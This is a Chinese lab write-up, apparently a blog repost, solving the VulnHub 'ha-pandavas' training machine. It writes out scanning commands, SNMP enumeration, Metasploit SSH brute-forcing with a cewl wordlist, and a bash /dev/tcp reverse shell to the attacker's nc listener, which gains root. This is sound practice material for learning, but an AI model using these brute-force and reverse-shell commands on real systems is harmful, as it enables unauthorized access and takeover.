vulnhub之ha-pandavas的实践

admin 2023年6月2日09:09:58评论18 views字数 890阅读2分58秒阅读模式

今天实践的是vulnhub的ha-pandavas镜像,

下载地址,https://download.vulnhub.com/ha/pandavas.zip,

用workstation打开,首先做地址扫描,

sudo netdiscover -r 192.168.177.0/24,

获取到靶机地址192.168.177.135,

vulnhub之ha-pandavas的实践

再继续做端口扫描,sudo nmap -sS -sV -T5 -A -p- 192.168.177.135

vulnhub之ha-pandavas的实践

再继续做udp端口的扫描,sudo nmap -sU -p161 192.168.177.135,

vulnhub之ha-pandavas的实践

有snmp服务,walk一下,snmpwalk -v1 -c public 192.168.177.135,

vulnhub之ha-pandavas的实践

获取到用户名,karna

有web服务,浏览器访问,http://192.168.177.135,

vulnhub之ha-pandavas的实践

爬取字典,cewl http://192.168.177.135 > dict.txt,

使用metasploit进行ssh暴力破解,msfconsole,

use auxiliary/scanner/ssh/ssh_login

set RHOSTS 192.168.177.135

set USERNAME karna

set PASS_FILE /home/kali/dict.txt

exploit

vulnhub之ha-pandavas的实践

获取到karna/Surya,直接ssh登录,

ssh [email protected]

vulnhub之ha-pandavas的实践

查看到其它账户,暴力破解改名,set USERNAME krishna,

vulnhub之ha-pandavas的实践

继续获取到krishna/Bhagavad,切到krishna,

sudo -l确认可以root身份执行任何程序,

kali攻击机那边用nc开个反弹shell监听,nc -lvp 4444,

靶机这边执行,sudo -u root bash -i >& /dev/tcp/192.168.177.131/4444 0>&1,

vulnhub之ha-pandavas的实践

kali攻击机这边获取到反弹shell,确认是root,

vulnhub之ha-pandavas的实践

本周的实践到此结束,本周的实践到此结束,本周的实践到此结束,本周的实践到此结束,本周的实践到此结束。

原文始发于微信公众号(云计算和网络安全技术实践):vulnhub之ha-pandavas的实践

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年6月2日09:09:58
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   vulnhub之ha-pandavas的实践http://cn-sec.com/archives/1751448.html

发表评论

匿名网友 填写信息